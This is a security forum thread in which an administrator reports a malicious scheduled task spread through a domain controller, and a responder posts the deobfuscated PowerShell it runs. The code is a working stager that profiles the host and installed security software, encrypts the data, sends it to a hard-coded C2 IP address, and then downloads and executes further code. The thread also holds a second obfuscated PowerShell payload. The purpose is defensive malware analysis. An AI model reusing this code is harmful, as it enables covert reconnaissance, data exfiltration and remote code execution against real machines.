A Memory Resident Virus ?

Ask your beginner questions here.
Post Reply
4everyone
Posts: 28
Joined: Fri Jul 16, 2010 1:59 am

A Memory Resident Virus ?

Post by 4everyone » Sun Jan 14, 2018 7:46 am

Happy New Year Folks !

I'm going through a situation where a Scheduled task is getting deployed through the Domain Controller to the workstation. And Task is running a wscript+powershell using a download link which is displayed in the scheduled task script.

Link is - http://192.96.206.191:9097/static/ka7ds ... AHSGA656gh

The above link has some coding. Not sure what its capable of or what actually this script does. Can someone let me know whats the purpose of the above script ? Appreciate your help in advance.

Thanks
4Everyone

User avatar
xors
Posts: 160
Joined: Mon May 23, 2016 2:01 am

Re: A Memory Resident Virus ?

Post by xors » Sun Jan 14, 2018 12:00 pm

Can you add as an attachment the script here?:)
@xorsthingsv2

4everyone
Posts: 28
Joined: Fri Jul 16, 2010 1:59 am

Re: A Memory Resident Virus ?

Post by 4everyone » Sun Jan 14, 2018 4:33 pm

Thanks for your reply. Here you Go.
You do not have the required permissions to view the files attached to this post.

N3mes1s
Posts: 42
Joined: Wed Mar 09, 2011 5:17 pm

Re: A Memory Resident Virus ?

Post by N3mes1s » Mon Jan 15, 2018 5:18 pm

Hello.
This is pretty interesting, seems to be a recon script(i dunno know if it's a know one and don't have time to check) in powershell. After multiple layer obfuscated with Invoke-Obfuscation and various download from the same ip, this is the code.

It is self explanatory at this stage just read the functions name :)

Code: Select all

function GsdsetWweter {
    $Serv = $args[0]
    $SK = $args[1]
    $USAG = $args[2]
    $Null = [Reflection.Assembly]::LoadWithPartialName("System.Security");
    $Null = [Reflection.Assembly]::LoadWithPartialName("System.Core");
    $ErrorActionPreference = "SilentlyContinue";
    $e=[System.Text.Encoding]::ASCII;
    function Get-SysID($HashName = "MD5"){
        [string]$ret = ""
        $hd = gwmi win32_bios
        $ret = $hd["SerialNumber"].ToString()
        [string]$String = $([Environment]::UserName +[Environment]::MachineName + $ret).ToLower();
        $StringBuilder = New-Object System.Text.StringBuilder 
        [System.Security.Cryptography.HashAlgorithm]::Create($HashName).ComputeHash([System.Text.Encoding]::UTF8.GetBytes($String))|%{ 
            [Void]$StringBuilder.Append($_.ToString("x2")) 
            } 
            $e = $StringBuilder.ToString().ToLower()
            $e
        }
  Function HasGet-Bretring($ht) { 
  $first = $true
  foreach($pair in $ht.GetEnumerator()) { 
    if ($first) 
    {
       $first = $false
    } 
    else 
    {
       $output += ';'
    }
    $output+="{0}" -f $($pair.Value)
   } 
   $output
  }

 function Get-workconfig {
  Get-WmiObject Win32_NetworkAdapter -Filter 'NetConnectionStatus=2' |
    ForEach-Object {
      $result = 1 | Select-Object Name, IP, MAC, ID
      $result.Name = $_.Name
      $result.MAC = $_.MacAddress
      $result.ID = $_.DeviceID
      $config = $_.GetRelated('Win32_NetworkAdapterConfiguration') 
      $result.IP = $config | Select-Object -expand IPAddress
      $result
    }
 
}
   
    function Get-Sysinfo {     
        $str = [Environment]::UserDomainName+'|'+[Environment]::UserName+'|'+[Environment]::MachineName; 
        $string = ""
        foreach($c in Get-workconfig){
            [string]$lanname = $c.Name; [string]$macadr = $c.MAC; [string]$ID = $c.ID
            $ip = @{$true=$c.IP[0];$false=$p.IP}[$c.IP.Length -lt 6];
            [string]$ip = $c.IP[0]; if(!$ip -or $ip.trim() -eq '') {$ip='0.0.0.0'};
            $lanconf = @{
            id = $ID 
            ip = $ip;
            mac =  $macadr; 
            name = $lanname;
            }
           $string += HasGet-Bretring $lanconf 
           $string += "!"
        }

        $o = (Get-WmiObject Win32_OperatingSystem)        
        $str += "|$string";
        $str += '|' +$o.Name.split('|')[0];
        if(([Environment]::UserName).ToLower() -eq "system"){
            $str += '|True'
        }
        else{
            $str += '|'+ ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")
        }
        [void] [Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms")
        $Screens = [system.windows.forms.screen]::AllScreens
        foreach ($Screen in $Screens) {                       
            $Width  = $Screen.Bounds.Width            
            $Height  = $Screen.Bounds.Height 
        }
        $str += '|' + "$Width`x$Height"
        $n = [System.Diagnostics.Process]::GetCurrentProcess()
        $str += '|'+$n.ProcessName+'|'+$n.Id
        $str += '|' + $PSVersionTable.PSVersion.Major
        $str += '|' + $ENV:PROCESSOR_ARCHITECTURE
        $str += '|' + (gwmi win32_timeZone -ComputerName $env:ComputerName).caption 
        $str += '|' + $o.ConvertToDateTime($o.LastBootUpTime)
        $str
    }
    
function getlisturi{
    $RandName = -join("abcdefghijklmoprstvuxyz".ToCharArray()|Get-Random -Count $args[0]);$ar = @('php','jsp','asp') | Get-Random;
    $RandName + '.' + $ar
    }

    function Get-Soft {
    param (
        [Parameter(ValueFromPipeline=$true)]
        [string[]]$ComputerName = $env:COMPUTERNAME,
        [string]$NameRegex = '(Opera|Firefox|Chrome|TAX|Lacerte|OLT|ProSeries|Ultratax|Drake|Taxslayer|ProTaxPro|Taxwise|Avast|ESET|Malwarebytes|McAfee|Norton|Panda|Sophos|Webroot|Bitdefender|Symantec|Trust|EICAR|Virus|Firewall|Defender|Secury|Anti|Comodo|Kasper|quickbooks|keypass|ftp|ssh|Outlook)'
    )
    foreach ($comp in $ComputerName) {
        $keys = '','\Wow6432Node'
        foreach ($key in $keys) {
            try {
                $apps = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey('LocalMachine',$comp).OpenSubKey("SOFTWARE$key\Microsoft\Windows\CurrentVersion\Uninstall").GetSubKeyNames()
            } catch {
                continue
            }
            foreach ($app in $apps) {
                $program = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey('LocalMachine',$comp).OpenSubKey("SOFTWARE$key\Microsoft\Windows\CurrentVersion\Uninstall\$app")
                $name = $program.GetValue('DisplayName')
                $str = ''
                if ($name -and $name -match $NameRegex) {
                    $str += $name + ';'
                    $str
                }
            }
        }
    }
}
            try {
                $FirstAES=New-Object System.Security.Cryptography.AesCryptoServiceProvider;         }
            catch {
                $FirstAES=New-Object System.Security.Cryptography.RijndaelManaged;
            }
    $FirstIV = [byte] 0..255 | Get-Random -count 16;$FirstAES.Mode="CBC";
    $FirstAES.Key=$e.GetBytes($SK);
    $FirstAES.IV = $FirstIV;
    $csp = New-Object System.Security.Cryptography.CspParameters;
    $csp.Flags = $csp.Flags -bor [System.Security.Cryptography.CspProviderFlags]::UseMachineKeyStore;
    $rs = New-Object System.Security.Cryptography.RSACryptoServiceProvider -ArgumentList 2048,$csp;
    $rk=$rs.ToXmlString($False);$ib=$e.getbytes($rk);
    $eb=$FirstIV+$FirstAES.CreateEncryptor().TransformFinalBlock($ib,0,$ib.Length); 
    $BotIDXor= Get-SysID;
    $EncodedText =[Convert]::ToBase64String($e.getbytes($BotIDXor));
    $EncodedText2 =[Convert]::ToBase64String($e.getbytes($EncodedText));
  if(-not $wc){
        [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }
        $wc=new-object system.net.WebClient;
        $wc.Proxy = [System.Net.WebRequest]::GetSystemWebProxy();
        $wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
    }
    $wc.Headers.Add("User-Agent",$USAG);
    $wc.Headers.Add("Cookie","SESSIONID:$EncodedText2");
    $raw=$wc.UploadData($Serv + "/" + $(getlisturi 9),"POST",$eb);
    write-host "STAGER GET raw   "  $raw
    $de=$e.GetString($rs.decrypt($raw,$false));
    $key=$de[0..($de.length-2)] -join '';
    $k=$de[$de.length-1] -join '';
  if ($k -eq 0) {
    $str1 =  Get-Sysinfo;
    $str2 =  Get-Soft;
    $str = $str1 + '|' + $str2
    }
  else{$str = 'OK'+ '|' + ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator") + '|' + ([System.Diagnostics.Process]::GetCurrentProcess()).id}
    $SecondAES=New-Object System.Security.Cryptography.AesCryptoServiceProvider;
    $SecondIV = [byte] 0..255 | Get-Random -count 16;
    $SecondAES.Mode="CBC"; $SecondAES.Key=$e.GetBytes($key); $SecondAES.IV = $SecondIV; 
    $ib2=$e.getbytes($str);
    $eb2=$SecondIV+$SecondAES.CreateEncryptor().TransformFinalBlock($ib2,0,$ib2.Length);
    $wc.Headers.Add("User-Agent",$USAG);
    $raw=$wc.UploadData($Serv+ "/" + $(getlisturi 13),"POST",$eb2);
try {$AES=New-Object System.Security.Cryptography.AesCryptoServiceProvider;}
catch {$AES=New-Object System.Security.Cryptography.RijndaelManaged;}
    $AES.Mode="CBC";
    $IV = $raw[0..15];$AES.Key=$e.GetBytes($key);$AES.IV = $IV;
    $shelles = [System.Text.Encoding]::ASCII.GetString($($AES.CreateDecryptor().TransformFinalBlock($raw[16..$raw.Length],0,$raw.Length-16)))
    iex $shelles
    $FirstAES=$null;$BotIDXor=$null;$rs=$null;$eb2=$null;$raw=$null;$IV=$null;$str=$null;$ib2=$null;$SecondAES=$null;$AES=$null; $SecondIV=$null;$shelles= $null;
    $Error.Clear()
    [GC]::Collect()
    [GC]::WaitForPendingFinalizers()
    federerfegegfeg $key "SESSIONID:$EncodedText2" $Serv '/sale/getinfo.php,/getnews.asp,/update/news.html,/defender/main.jsp,/mains.asp|Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36 Edge/12.0' $([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator") $PSVersionTable.PSVersion.Major
    }
  GsdsetWweter 'https://192.96.206.191' ':nP&2[Ia+4E7)V~z.M5pvdrsXle$]!U(' 'Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36 Edge/12.0'
https://ghostbin.com/paste/83av7

4everyone
Posts: 28
Joined: Fri Jul 16, 2010 1:59 am

Re: A Memory Resident Virus ?

Post by 4everyone » Mon Jan 15, 2018 7:48 pm

Thanks for your time looking in to this N3mes1s.

Regards,
4Everyone

4everyone
Posts: 28
Joined: Fri Jul 16, 2010 1:59 am

Re: A Memory Resident Virus ?

Post by 4everyone » Fri Jan 19, 2018 6:04 pm

Hi N3mes1s,

I found another Obfuscated code running through the GP. can you please decode this for me , so that i will be able to get what it does ?

Code: Select all

. ( $VERbosePREFeREnCe.tosTrINg()[1,3]+'X'-JOiN'') ( ( '146P165h156z143}164<151z157b156;40j107P145}164}55<116;145<167<55<120b162h157L143z173g15}12b160L141b162g141g155P40P50P133L163g164;162h151z156z147;135g44}144j141;164g141P51j15b12b44P120j157P167z145<162g163<150b145g154<154j105<170;145}40g75}40}47}160z157<167b145h162}163P150g145;154j154g56<145}170P145<47L73<40g15b12z164;162h171<40P173;44<160b163}151L40L75z40z116;145<167j55h117j142j152P145L143L164}40b123<171b163z164;145}155h56<104z151b141L147L156j157h163j164h151b143L163z56}120L162z157}143P145j163;163j123z164g141<162b164;111}156P146}157<73;44h160}162z157j143j75;156z145;167;55h157g142<152z145L143<164<40b123}171<163h164;145g155j56P104P151P141j147}156P157;163L164g151P143<163z56}120g162g157}143j145<163b163P73<44h160j163b151h56L103j162j145z141;164h145}116}157g127<151;156L144h157j167<40<75}40;44;164P162b165;145L73}44;160;163g151h56;127h151h156;144z157g167}123j164P171}154z145g40L75b40g47P110}151P144L144L145;156b47z73<44<160P162z157j143g56<123L164;141;162;164z111j156j146;157}40P75g40j44P160z163;151j73b44h160P162P157L143P56;123b164P141}162}164;111<156<146}157L56b106b151j154;145<116j141g155<145z40g75g40L44j120}157b167L145P162;163z150<145b154P154h105b170b145b73h44g160j162}157g143h56h123<164j141j162h164j111h156P146b157}56j101z162b147g165;155}145}156h164<163}40;75P40z47;55;156b157h145P170L151j164g40<47<40}40j40}53z40j47}55b156j157L154<157h147j157<40h47h53j47j55L156L157b160j162j157;146}151z154z145P40P47;53z47z55z116g157;156h111b156b164P145;162}141;143h164<151;166}145g40}47;53P40<47j55<105b156<143L157P144h145L144h103b157j155<155L141g156L144<40L47z53h40g44g144;141j164g141g73j44h160;162b157}143b56g163b164g141P162h164<50g51b174b40<117g165j164g55L116h165<154h154g40P73;175}15g12z143z141z164g143h150g40j173b40}44}137j56j105<170b143b145P160;164j151;157<156j56b115;145j163g163g141;147;145z73P175P15b12L146L151b156h141L154j154z171<173j44<144}141h164h141<40g75g40h44j156P165}154z154P73b133P107P103<135z72<72b103<157<154}154}145b143g164h50L51b73<133L107j103;135z72b72b127;141}151L164<106z157b162j120b145L156h144;151g156L147h106<151g156;141j154j151b172j145b162g163h50;51;73}175P175<15;12P107;145b164j55L116j145g167b55P120<162b157h143b40<55}144<141z164L141h40b47h141h121z102z154P101j110h147L101b111;101j101<153b101P103P147g101<127z167j102j123<101b107b125<101<122j147h102j144h101L103z64L101j121<121L102<124<101g106b115z101b132}121L102b164;101h107h111b101;124<101b102b65}101h103;64b101<122;167}102h154<101j106b121g101P126b101b102;132g101P106g101b101g122L121g101}157P101<103z143z101b125;167b102j65<101z110h115b101;144;101}102j154g101P107j60h101j114g147b102;116g101b107}105z101j142}147<102P150j101}107b143h101z132z121}102g164L101}107;125j101j142b147P102P60<101;103}64<101g121;121h102j61}101j110b121L101g142z167L102}164P101z107h105}101b144z101}102g160h101<107j70j101;142z147L101j165L101j105P105b101g142<121h102}172g101b107b153h101z126P121b102}60}101<107}153<101h142z101b102b172b101;103<143P101z113<121b102P70L101b104z70j101<145P167L101<153j101L106P70;101j146L121P102b70<101j103<125j101P145g167L101L153j101j106P70<101g114g147L102h110}101}105P125;101}144}101<102g107j101;107}153h101b132<121j102L163P101g105L121L101<113j101j101L156L101g107L105g101b142z121P102L172j101b107L153j101h123g121<102b165<101j107<153h101h144<101z102;107h101j107<105L101<141b121L102<163g101;107}125;101}132z101P101b156z101P103;167<101}112<167P102L117b101<107z70;101;142P147L102}121P101z110b125L101L131<147j102;163P101b107h153b101b131b167L101P163<101z106L115L101;144g101;102j150b101j110j121z101h141g121P102b152}101}103g143b101b113h121L101}165<101<106<115}101<122<121L102}125<101;106;131z101z121h121P102b115;101h106P125b101z122P121;101L157}101P103h121;101j124h147j102;126P101h105g167g101}142<101b101g163P101<103}121;101j126}101L102z123;101}110;125h101b122b121L101;160b101;110z60h101h117z167b102<142g101P106z115g101P145g121<102g172h101L110<121P101j132h121;102P164b101g103b64P101}124P147L102L154<101}110L121}101j114<147b102<124z101g107;125P101L143g147z102;62<101j107}153L101<131P167j102b154h101z106b101;101z142b167g102z160j101b107b64;101P144z101b102z116b101L107;105b101L142<147z102j150b101P107P143<101;132h121b102P171<101g106<60}101j117P147}101h66L101}106;115L101L132b121P102P171g101P110z131b101z132j121L102}171}101z105h115P101b132z121z102;171P101h110<121z101b141L121h102P155;101h107j153b101z131;167z102b150g101h110;121b101;132z121L102;127g101L107;105}101g142j101g102z160<101g107b121L101L131P121L102j60j101;107z153b101h142g167;102P165j101;105j115<101b131L121<102<163h101j107}167g101b131j147b102z150}101L107j115P101L141P167b101}71j101P110g163b101L112<101b102}60L101}110z111;101}144;121}102<154h101L110P60h101h117b167z102j142;101z106;115;101;145b121b102L172z101L106}121h101j122L121g102P164<101;103<64h101;124;147;102L154;101z110L121P101z114z147}102g124;101<107P125h101L125L147h102<62<101P105P153g101;121j167h102;154}101j106}101g101;142g167;102}112h101z107P64b101<144}101z102z116}101}105}105h101}142h147L102z150g101}105<143h101z122j121j102h171P101j106j60P101b117h147h101;66P101}105<125P101g145z101L102j167;101}107b125}101g131}167L102<60j101}104}105<101h115j101g101g167z101z105h115z101}142z167z102;165h101g106h121}101}123j121j102z117b101b110g125P101j122z121P101<71<101j104<101j101b117;167b101P147}101<103g147}101P124j147<102h154;101}110;143g101L114h121h102z120L101<107}111h101g141L147j102z154}101b107L115<101j144z101g101;147}101j106P115b101z145L121z102L172b101g110<121<101P132g121}102}164P101b103<64j101L124;147z102;154z101j110;121}101L114}147z102;130g101L107P125;101}131g147P102;104L101L107;167h101b141}121b102g154;101b107P64L101}144L101b101L160b101j103j64}101}122;101h102z166}101<110b143h101}124<147b102j115<101<105L70}101P131;121z102P153j101}106<115<101L144P101j102;123z101P105z153L101h124;147g102z110b101h103h147L101z112g167z102;157b101j110b121j101g144L101L102L167L101L110L115b101g117L147h101z166L101z103z70b101;115<121h101}65P101j104z111}101}114}147h101z65g101L104z131}101b114g147<101b171;101z104}101j101h116j147h101P165z101z104z105}101z117j121P101j170z101;103P70P101<112g167;101g162;101z103;101}101z112}101L101b157P101<103b60P101P141L147g102}166z101L107;153h101;142g147g101g157P101;103}143z101b121}121j102L103;101;105j115P101}122h101P102b106L101L105h131b101P122h167g102g111j101b105j163}101g124P101P102j116P101b105b64<101z142<147L102<166g101P110;101h101j143;121b102j171g101b110}115h101h144L101g102<62}101;110h125P101j144b167z102<64g101b110P153z101j145b147<101j156z101;103g64g101<126P101<102}166j101;105b115g101g141P101g102b150j101z110P111b101<121;121}102L171;101L110P111;101j131h121z102j65<101h103z147j101P113;121h102<70g101b105g143h101h132z121h102<60P101z103j60}101z125g147g102P150j101z107h64L101g132z101g102L166b101P107P60L101L111j101;101}164g101;105;115L101<142;167h102z61z101}107;64;101}144b101;101<147g101z104z147P101j113;121h101}160L101}103<163;101;112g167h101L165P101L103}143}101j113b167b101j147g101<103<121j101z113;101h102g101z101;103g147<101P112h167b102b167L101;107;147j101}143h101L101<156j101P103g167b101g112<167<102<161b101P110P115j101h143L101g101L156P101<103<167L101}112j167L102L150P101L110h115z101;143z101<101z156}101L103b153h101;111j101z102}70P101;103<101P101b122j167b102<154g101g110<121b101j114h121}102;123P101g107L105;101g142L147<102<153<101j107P70}101P142g121z101h160z101;103g153P101}113g121g101z75<47<15g12L163}164P141z162L164<55L163}154h145b145b160<40;55g163h40P65}15}12g145j170P151b164'-SPLiT ';'-SplIt'}' -sPlit'z' -Split 'b'-SPLiT 'P' -SPlit 'j'-SpliT '<' -sPLiT'L' -SpLiT'g' -SPlIT 'h'|FoREaCH{ ( [ConVERt]::tOINT16(( [STrInG]$_ ) ,8 ) -aS [CHar])} ) -jOiN'' )

4everyone
Posts: 28
Joined: Fri Jul 16, 2010 1:59 am

Re: A Memory Resident Virus ?

Post by 4everyone » Fri Jan 19, 2018 10:57 pm

Dont worry about it. I got it figured out. Cheers !

Post Reply